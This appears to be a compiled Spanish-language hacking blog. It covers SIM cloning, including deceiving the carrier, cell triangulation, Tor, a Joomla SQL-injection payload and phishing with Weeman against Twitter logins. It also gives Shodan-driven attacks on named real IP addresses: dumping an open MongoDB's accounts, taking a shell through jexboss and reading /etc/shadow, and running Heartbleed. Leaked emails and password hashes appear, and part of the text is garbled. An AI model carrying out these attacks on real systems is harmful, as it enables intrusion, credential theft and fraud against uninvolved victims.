HACKER ANGELWHITE GALC

domingo, 17 de septiembre de 2017

Cómo clonar una tarjeta SIM





La siguiente guía nos permite hacer clones de SIM utilizada en los telefonos celulares con red GSM que significa que puede utilizar un número con dos tarjetas SIM al mismo tiempo.
En primer lugar una pequeña introducción acerca Tarjeta SIM:
Nuestras tarjetas SIM contienen dos códigos o claves secretas llamadas (valor IMSI y el valor KI) que permite al operador saber el número de móvil y autenticar al cliente, estos códigos están relacionados con nuestros números móviles que los operadores guardan en su amplia base de datos, es basado en estas claves secretas que a ellos les permite la facturación que se hará a ese cliente.
Ahora lo que hacemos en la clonación sim es extraer estos dos códigos secretos de la sim y programarlos en una nueva tarjeta inteligente en blanco a menudo conocida como wafer, ya que el la autenticación ante el operador se basa en estos valores, nos permite engañar a los operadores haciendoles creer que es la sim original.
Ahora que las tarjetas SIM se pueden clonar:
Las tarjetas sim se fabrican a partir de 3 algoritmos COMP128v1, COMP128v2 y COMP128v3
Ahora una nota importante, actualmente sólo tarjetas SIM versión COMP128v1 pueden ser
clonadas, ya que este es el único algoritmo que ha sido roto por los usuarios, ten en cuenta que el 70% de todas las tarjetas SIM que utilizamos son COMP128v1.
Con todo esto en mente, vamos a los pasos:
1. Compra un lector de tarjetas SIM
2. Necesitaras una tarjeta SIM en blanco o tarjeta súper SIM
3. Descarga el programa MagicSim
5. Instala los programas.
6. Ve a Herramientas del teléfono, seleccione la tarjeta SIM, a continuación, seleccione desbloquear SIM, será solicitado un código.
7.  Llama al proveedor de la red, te le pedirá su número de teléfono, tu información de la cuenta, nombre y código de seguridad, a continuación, se le preguntará por qué deseas desbloquear tu tarjeta SIM, basta con decir que necesitas desbloquear el SIM para trabajar con tu teléfono en el extranjero.
8. Una vez que te dan el código de desbloqueo SIM, introducelo, y te dirá SIM desbloqueado.
9. Quita la SIM de tu teléfono, colócalo en el lector de tarjetas, haz clic en leer desde la tarjeta SIM en el programa de magicsim.
10. Una vez que diga conectado, selecciona SIM Crack en la barra de herramientas. haz clic a strong ki y selecciona todas las otras opciones de encontrar y haz clic en Start.
11. Una vez que el ki se haya encontrado y el crack esté terminado, haz clic en Archivo, Guardar como y guarda la información de tu SIM crack a ese archivo.

12. ¡¡IMPORTANTE!! debes hacer clic en Desconectar en el menú archivo o se puede arruinar la tarjeta SIM. una vez que diga desconectado, retira la tarjeta SIM.
13. Ahora inserta la tarjeta 3G en blanco. Utiliza USB SIM Card Reader Software 3.0.1.5.
14. Haz clic en Conectar
15. Te mostrará que no encontró información si esta verdaderamente blanco.
16. Seleccione Escribir a SIM, te aparecerá que selecciones un archivo dat, selecciona el que guardaste antes, ahora haz clic en Start, tomará alrededor de 10 minutos para escribir, una vez que se haya completado, se te pedirá un código de seguridad , ingresa el código que te proporciono el proveedor de red, a continuación, haga clic en Finalizar.
17. Tu tarjeta ha sido clonada. si tratas de hacer 2 llamadas al mismo tiempo, uno va a pasar, la otra fallará, y en los dos teléfonos obtendrás los mismos mensajes de texto y voz, y ambos recibirán las mismas llamadas, pero sólo uno podrá hablar a la vez.





Hoy en día, voy a explicar a usted cómo el FBI puede rastrear cualquier número de teléfono móvil a una ubicación exacta en territorio de Estados Unidos. Este método se llama "búsqueda triangular" o "huella triangular", o simplemente "triangulación".

Esta forma de seguimiento requiere acceso directo a los sistemas del proveedor móvil celular, por lo que no es algo que está disponible para el hacker promedio. Sin embargo, puesto que muchos de ustedes podrían estar planeando unirse a la agencia responsable de la inteligencia de su país, que podría ser muy importante saber cómo funciona la triangulación!

Para entender mejor la triangulación, vamos a ver la forma de una torre celular. Tome en cuenta que tiene la forma de un triángulo: 



Cada lado del triángulo se denomina sector . Estos sectores son etiquetados por las letras griegas alfa, beta, y gamma (a, ß, Y) . Dentro de cada sector, la torre se puede ver lo lejos que un teléfono celular conectado es. Esto le permite "rastrear" el teléfono celular: detectando qué sector está conectado a, y lo lejos el móvil es. Aquí es una representación de estos sectores, con la torre de telefonía celular estar en el medio:

Ahora, supongamos que nuestro destino está conectado a gamma sector , y está en el rango de números 4 . Entonces sabemos que el teléfono móvil está en algún lugar en el área marcada por el amarillo:


Creo que se entiende la idea. Vamos a pasar a lo que ocurre cuando usamos 2 torres!

Cuando un teléfono celular está conectado a 2 torres que se superponen entre sí , al mismo tiempo (esto debe ser el caso), podemos aumentar aún más nuestra exactitud en la localización del teléfono. El teléfono celular está conectado a la torre de azul alfa sector y está en la banda 5 'th (5 millas) en la distancia, mientras que también está conectado a la torre de naranja sector gamma y está en la banda 4'th de la distancia (4 millas ) de la torre de naranja, podemos rastrear el teléfono celular realmente con precisión mediante la comparación de los resultados de las 2 torres 2, como se muestra a continuación:

Ahora, si una tercera torre se pone en juego, tenemos lo que se llama una "triangulación". En este caso, podemos rastrear el teléfono celular realmente con precisión! Vamos a ver lo que sucede cuando traemos una tercera torre en:

Como se puede ver, el teléfono móvil es de nuevo dentro del círculo rojo. Si se mueve hacia la izquierda, entra en la banda de la torre verde 6. Si se mueve a la derecha, entra en la banda de la torre verde 4. Si se mueve hacia abajo, entra en el sector gamma de la torre verde y también entra en la banda 4 de la torre azul. Creo que todo consigue la idea.

Sólo el gobierno o el proveedor de telefonía móvil podría llevar a cabo una triangulación, a menos que un hacker ha puesto en peligro el sistema, por supuesto.Esta forma de trazado es muy fiable y se utiliza mucho por el FBI, porque el destino no necesita tener GPS o cualquier otra cosa en, que sólo necesita ser conectado a una antena de telefonía móvil.

La triangulación es casi siempre posible en las zonas urbanas, debido a que las torres están cerca uno del otro, pero es menos común en las zonas rurales, donde las torres están más separados que en una ciudad.

--------------------
POST BY: [ KelvinSecurity - KelvinSecTeam ]

Kali Linux Tools - Gathering Email InformationTool (INFOGA)

Bien Mi querido y estimado lector hoy les vengo a traer una gran poderosa herramienta, la cual esta basada en python, y sirve para capturar y reunir información de las cuentas de correo electrónico de diferentes fuentes públicas (motores de búsqueda, servidores de claves pgp).

Codigo Fuente para descargarlo.

https://github.com/m4ll0k/infoga







sábado, 9 de septiembre de 2017

Auditando Website Joomla con joomlavs




Saludos hermanos de facebook, estuve revisando algunos mensajes de algunos usuarios que me pedian que elabore un POST sobre "Analisis de vulnerabilidades en el CMS JOOMLA", bueno empecemos.
Joomlavs es una aplicación de Ruby que puede ayudar a automatizar la evaluación de lo vulnerabilidades. puede buscar vulnerabilidades en los componentes, módulos y plantillas, así como las vulnerabilidades que existen dentro de Joomla en sí.

Descargamos el repositorio:

codigo:
git clone https://github.com/rastating/joomlavs.git

Instalamos Bundler.
codigo:

sudo gem install bundler && bundle install
Instalamos algunas dependencias, entre ellas Nokogiri

codigo:

sudo apt-get install build-essential patch

sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libcurl4-openssl-dev

Auditaremos el servidor de manera "Estandar"

codigo:

root@kali:~/joomlavs# ./joomlavs.rb --scan-all --url http://www.paginaweb.com/

Encuentran los modulos vulnerables, se van a Exploit DB y al final un buen
Pentest.
Son las 03:04 de la madrugada y no voy a teste
Saludos hermanos de facebook, estuve revisando algunos mensajes de algunos usuarios que me pedian que elabore un POST sobre "Analisis de vulnerabilidades en el CMS JOOMLA", bueno empecemos.
Joomlavs es una aplicación de Ruby que puede ayudar a automatizar la evaluación de lo vulnerabilidades. puede buscar vulnerabilidades en los componentes, módulos y plantillas, así como las vulnerabilidades que existen dentro de Joomla en sí.
ar exploit por exploit xD!

available databases [12]:

ADMISION
cacti
claro_unsa
claroline
DB_CERCAP
information_schema
mysql
ocsweb
seis
SICONIN
test
unsa_AA0001
En mi opinión esta herramienta es muy util.

encontramos fallas como  SQL Injection Vulnerability y nos envia las siguientes posibilidades  Reference: https://www.exploit-db.com/exploits/31459 , el cual nos envia a la siguiente pagina para sacar los Exploits. y nos envia la siguiente y posible vulneravilidad dada

######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Tested on: Windows
######################################################################
 
parameter 'theme_id' in GET vulnerable
 
# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
 
# ==================================================================================== #
 
parameter 'image_id' in POST vulnerable
 
# Example :
# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
# Parameter: image_id (POST)
# Type: error-based
# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search
 
 
# ~ Demo ~ # $>
 
 
#EOF



¿QUÉ ES Y CÓMO FUNCIONA LA RED TOR?

tor 



Tor es una red que implementa el famoso enrutado cebolla (onion routing). El objetivo de esta red es cambiar el modo de enrutado tradicional, el que todos solemos utilizar, con el fin de mantener el anonimato y la privacidad de los datos.
¿Enrutado cebolla? ¿Qué es eso?
Como ya he dicho hace un par de líneas, lo utilizamos para comunicarnos a través de redes que preserven la privacidad de forma totalmente transparente al emisor y receptor, es decir, anonimato.
Normalmente utilizamos un enrutado directo. Con directo quiero decir que si quieres visitar una web, esta información va de tu ordenador a tu router, del router a los enrutadores de tu proveedor de Internet (ISP) y finalmente a los servidores de esta web. Es un camino directo. No tiene por qué ser siempre el mismo, pero es directo. El problema es que cualquiera que esté escuchando esa conversación entre el servidor de la web y vuestro ordenador, sabrá perfectamente quién eres. De esos datos puede obtener nuestra IP y la del servidor, por ejemplo.
Si queremos tratar de mantener nuestro anonimato, podemos hacer uso de Tor. Su enrutamiento es indirecto, es decir, que manda los paquetes a través de varios nodos de forma aleatoria.
Vamos a suponer que tenemos un ordenador A y un ordenador B. A quiere enviar un mensaje a B y realiza una conexión a un servidor que contiene las direcciones de los nodos Tor que vemos en la siguiente imagen. En este caso, A es Alice y B es Bob (típicos nombres que se usan para explicar estas cosas).
onion routing
Después de recibir la lista de diracciones de este servidor, nuestro cliente Tor (estará en nuestro equipo) se conectará a un nodo aleatorio a través de una conexión encriptada. Este nodo escogerá otro nodo aleatorio con otra conexión cifrada y, así hasta llegar al nodo de antes de Bob. El nodo de salida (penúltimo de la comunicación) hará una conexión no encriptada con Bob. Todos los nodos Tor son elegidos al azar y ningún nodo puede ser utilizado dos veces. En caso de que la red esté congestionada, habrá nodos que no se utilicen. Esto lo vemos en la siguiente imagen:
onion routing 2
Ahora, ya podemos ver la estructura de los datos en el enrutamiento cebolla. Utilizando un cifrado asimétrico, Alice cifra el mensaje por capas (como una cebolla). Lo primero que hará es cifrar el mensaje con la clave pública del último nodo de la lista, para que sólo él lo pueda descifrar. Además, cifra e incluye las instrucciones para llegar al destino, que es Bob. Todo este paquete se cifra de nuevo añadiéndole las instrucciones para llegar al último nodo de la lista con el fin de que sólo este pueda descifrar el paquete y que acabe llegando al nodo Bob.
onion routingf keys
Estructura_de_cebolla.svg
Para evitar el análisis de nuestras comunicaciones por parte de terceros, cada 10 minutos se cambian los nodos  de la conexión Tor, escogiendo nuevos nodos. Esto podemos verlo en la siguiente figura:
onion routing 3
Los nodos de la red Tor son públicos. Si nosotros mismos somos un nodo, incrementaremos nuestra privacidad. Aunque esto suene contradictorio, explicaré por qué ocurre esto: si Alice usa la red Tor para conectarse a Bob, necesitará conectarse a otro nodo Tor. Sin embargo, si funciona como un nodo para Jane o Dave, también estará conectada a otro nodo. Por lo tanto, un tercero no podrá saber si la comunicación por parte de Alice ha sido iniciada como usuario o como nodo.
Esto hace que la extracción de información sea más compleja por parte de un tercero. Si Alice funcionase como nodo para decenas, centenas de usuarios, sería realmente complicado espiar sus datos.
onion routing 4
Como conclusión, podemos decir que el onion routing nos proporciona más privacidad que el enrutado normal y corriente. Exceptuando el primer y último nodo, nadie sabe de dónde viene o a dónde va la información que enviamos. El mensaje va encapsulado en muchas capas encriptadas, lo cual nos proporciona un extra en la privacidad buscada.
tor red privacidad
No es infalible. Como todo sistema, tiene fallos. Pero eso sí, es difícil encontrarlos.
Espero que os haya sido de utilidad este artículo, por lo menos para saber cómo funciona el enrutado cebolla y sobre todo para aprender. Si tenéis alguna duda, dejad vuestro comentario.
¡Un saludo!
Fuente de las imágenes: WikiPedia.org, iusmentis.com


Clonando plataformas web con Weeman



Saludos mis queridos fieles lectores en esta oportunidad les traigo un automatizador  para clonar plataformas web de manera rápida y sencilla.

¿Que es Weeman?

Es una herramienta desarrollada en Python para clonar cualquier sitio web y capturar los datos almacenados.
(Soporta HTTP & HTTPS)

Instalación:

root@kali:/# https://github.com/evait-security/weeman.git
root@kali:/# cd weeman

Requisitos: bs4

root@kali:/# pip install bs4

Ejecutando:

root@kali:/# cd weeman


weeman > set url https://twitter.com    (Sitio web que deseamos clonar)
weeman > set action_url https://twitter.com/login/error (Redirección de la pagina) 
weeman > set port 80   (Puerto por defecto)
weeman > run
Si observamos nos sale que el puerto esta en USO, porque tengo el apache activado. ( de manera automatizada te establece el puerto de escucha)
weeman > set port 8080
weeman > run



Enviamos nuestra URLa nuestra victima ( claro con nuestra IP Lan o WAN )


Cuando nuestra victima ingrese sus credenciales correspondientes de manera automática lo redireccionara:


¿Muy creíble verdad?, ahora en segundo plano ustedes tendrán sus credenciales:













 
 





 

Pentesting con Shodan & Exploits funcionales


Saludos fieles lectores, luego de un largo tiempo de vacaciones nuevamente estoy retomando el blog, es un placer nuevamente servirles como lo eh estado asiendo desde años atrás.

Sin mas que decir, hoy tocaremos el tema sobre "SHODAN" en su modo Pentesting, utilizando Exploits funcionales que les ayudara  a comprender y auditar servidores vulnerables que existen.

Si deseas aprender lo basico de shodan puedes visitar el siguiente enlace:

http://www.backtrack-omar.com/2015/02/shodan-el-buscador-del-informatico-de.html

en primer lugar antes de pasar con la metodología de explotación, tendremos un "Extra" con un gestor de base de datos "poco conocido por algunos", pero utilizados por servidores grandes & pequeños.

MONGODB:

MongoDB es un sistema de base de datos NoSQL orientado a documentos, desarrollado bajo el concepto de código abierto. MongoDB forma parte de la nueva familia de sistemas de base de datos NoSQL

fuente & más información:

https://es.wikipedia.org/wiki/MongoDB

como sabemos MongoDB es un sistema de DB basado en el concepto Open source, pero porque tal gestor esta en este POST.


En su plataforma web, shodan tiene varias secciones donde podemos interactual con ellos, un claro ejemplo es "Databases":

https://www.shodan.io/explore/category/databases


Podemos ver que nos muestra servicios conocidos tales como "MySQL" y "PostgreSQL" denominado (El Oracle OpenSource).

Entre otros el que utilizaremos en esta prueba de concepto "MongoDB",etc.

Ustedes poden darle "CLIP" al servicio mongoDB O simplemente utilizar su "DORK" para una búsqueda personalizada.

product:MongoDB

Podemos observar en la imagen solo nos muestra "2" resultados, que si lo leen bien tenemos lo que se le denomina "FUGA DE INFORMACIÓN".

¿Que es una fuga de información?

Son datos de información delicados o sensibles de un servicio privado que se muestra por motivos humanos o directorios mal protegidos, pero en su gran mayoria existen servicios que muestran tales datos como lo es MongoDB:


Target:

173.208.176.236


Database Name Size
zakey 49.8 GB
local 2.1 MB
admin 1 byte







Tenemos: LA IP y las base de datos que nos arroja directamente, si bien sabemos que un servidor con credenciales no arroja mas halla que un panel de usuario, porque en esta busqueda nos arroja datos sensibles.

Es simple, porque al buscar el producto MongoDB, shodan empieza a recopilar la información de tal gestor de base de datos, que tiene una mala configuración de seguridad.

¿como podemos "Acceder" a los servicios vulnerables?

 bueno es simple, si estas en GNU puedes instalar el servicio mongoDB de la siguiente manera:

root@kali:~# apt-get install mongodb
 una ves instalado, debemos activar el servicio de la siguiente manera:

root@kali:~# service mongodb start

luego de activar el servicio, como puedes ver si esta activado pues es simple:

root@kali:~# service mongodb status


como vemos en la imagen nuestro servicio esta activo, ahora como lo conectamos a nuestro victima.

En esta prueba de concepto nuestra victima sera:   

https://myeglu.com/ 

https://www.shodan.io/host/104.155.198.131


Conectando al servidor de nuestra victima:

root@kali:~# mongo --host 104.155.198.131

como vemos que nos hemos conectado al servidor por medio de la shell, ahora les enseñare el proceso de sintaxis de mongodb para poder interactuar en la base de datos.


 > show dbs                      - ver todas las base de datos.

 > use shop                       - Escoger la base de datos para interactuar.



 > show tables                  - ver tas tablas de la base de datos.


 > db.accounts.findOne() - Extraer todos los atributos de una tabla.

Lo primero que hice fue establecer una vista a las base de datos del servidor, posteriormente escogí la base de datos llamada "shop", luego ejecute show tables para ver todas las tablas que tiene y sin dudar dumpie los datos de la tabla "accounts" y pude obtener los atributos de dicha credencial:
"name" : "gopinath@wiznsystems.com",
"email" : "gopinath@wiznsystems.com",
"password" :   "$2a$07$342f56c383d6bd241ed54OLVQdfEDP3jZA.PiaO8BGP3yosLCevRy",
"roles" : [
"admin"



de igual manera tu puedes editar todo los atributos de las columnas porque tienes todos los privilegios necesarios, si eres de las personas que se aburren escribiendo todo en texto plano dichas sintaxis, puedes instalar "Robomongo" - GUI para facilitarte todo este proceso:



Descarga:

https://robomongo.org/download



Pentesting

Explotando un servidor apache obteniendo una SHELL por medio del fallo 5-5.
de tomcat.

EL fallo tiene mucho tiempo de a ver sido descubierto, hace mucho  tiempo, en mi caso hubiera elegido hacerlo por msfconsole pero me dio mucha flojera xD
ya que me hubiera gustado enseñarles como auditar un servidor apache para saber si es o no vulnerable, y explotarlo por diferentes maneras, pero creo que por mas técnicas que les enseñe, todo ese proceso puedo ser optimizado por el siguiente exploit:

"Jexboss"


https://github.com/joaomatosf/jexboss


Descarga:

root@kali:~# git clone https://github.com/joaomatosf/jexboss


Encontrar servidores vulnerable:
 

Server: Apache-Coyote/1.1 Tomcat-5.5





En mi caso elegí un servidor de mi país:

http://190.102.149.180:8080/

Si desean utilizar una búsqueda personalizada pueden utilizar las siguientes dorks:

country:es           "PAÍS"
city:barcelona     "CIUDAD"
hostname:es        "DOMINIO"

ustedes pueden efectuar cualquier rango de país que deseen.

root@kali:~#cd tomcat

root@kali:~/tomcat# python jexboss.py -host http://190.102.149.180:8080/


como vemos hemos obtenido una sesión por medio de una shell, lo que haremos sera verificar en que S.O esta corriendo, por mi parte viendo que es un ordenador peruano, suponía que seria un windows server xD!

Les dejare algo en claro, si el sistema operativo es "WINDOWS" debemos utilizar interpretes de comandos #CMD, para poder interactuar correctamente con el servidor.






Si fuese un sistema "GNU" puedes utilizar el comando "uname -a" para saber la kernel que esta utilizando, pero este exploit automáticamente te detecta y muestra el kernel.


la navegación muy diferente un ejemplo para ver los directorios y que permisos tendríamos ejecutan: ls -la.

si deseas obtener credenciales del usuario del sistema operativo utilizaremos 2 comandos:


Shell> cat /etc/passwd - sirve para verificar los usuarios que corren en diferentes servicios.
 

Shell> cat /etc/shadow -dumpear credenciales de servicios principales.
 

Credencial:
 
root:$6$3cdgngze$gafERX.OCPKvDAhgp9WyriAnR/iuDBZq6WjcZxe8BaFGga/Z5Zz1cCfj7aCxrrZB20RL3j6frbVBDzCZiCa9g0:17107:0:99999:7:::
 

Bueno si deseas obtener la contraseña puedes hacerlo por "brute force" o simplemente ejecutando una sesión meterpreter por msfconsole y empezar a desmadrar el servidor, por un Exploit local.

Cabe decir que el exploit recientemente ha sido actualizado, con la cual se han añadido mas servicios vulnerables y un "BYPASS" sobre algunos WAF.


Exploit heartbreak

Sin duda uno de los BUG's mas peligrosos a nivel mundial, que se descubrió en el año 2014, aun recuerdo esos años con el foro BlackLastSecurity que funde con mi buen amigo, Kelvin Parra.

Empresas importantes a nivel mundial fueron victima de ataques como:
Youtube, Facebook, Google, Twitter, etc, un 99.9 % de servidores a nivel mundial fueron comprometidos en aquel entonces.
Seguimos con algunos "Tips", si bien es cierto algunas personas no han explotado un servidor con la vulnerabilidad Open SSL llamado Heartbleed.

Si deseas encontrar algunos de estos servidores vulnerables "SHODAN" te ofrece una búsqueda avanzada:

https://www.shodan.io/search?query=vuln:cve-2014-0160


Tenemos 141,927 resultados, para que vayan experimentando este tipo de ataque.


Exploit:

https://mega.nz/#!vURiyJgY!aooAkIOuSX02CpYwjS45XI3zBD5GfLAM28qsfywJgJs

Una ves descargado lo extraemos con el nombre de la carpeta "bleed", posteriormente pasaremos a ingresar a dicha carpeta.

root@kali:~# cd bleed

modo de uso la mayoría de dispositivos encontrados trabajan con el puerto 443:

https://www.shodan.io/host/209.166.152.220

root@kali:~# python heartbleed.py 209.166.152.220 

Se ejecutaría de esta manera, sin el puerto por el simple hecho de tener el puerto por default


Este host corre el servicio en el puerto 8443:

https://www.shodan.io/host/188.165.216.132

Entonces lo ejecutaríamos de esta manera:

root@kali:~# python heartbleed.py 188.165.216.132 8443


Hemos explotado el servidor correctamente capturando el trafico de peticiones en vivo, este bug es temido porque captura el trafico de datos de peticiones de la web en su totalidad, cabe decir que si una "organización" grande como facebook en el 2014 millones de peticiones se hacían por minuto, cuantas credenciales fueron capturadas en vivo.

Ahora imagínese en empresas millonarias como PayPal, Ebay, etc el dolor de cabeza que tuvieron en aquel entonces y los millones de dolares que se perdieron.

por ultimo no quiero hacer este POST demasiado largo con otros métodos, espero haberles ayudado.

Saludos! 


Dato por el Hacker  CyberPunks Hackers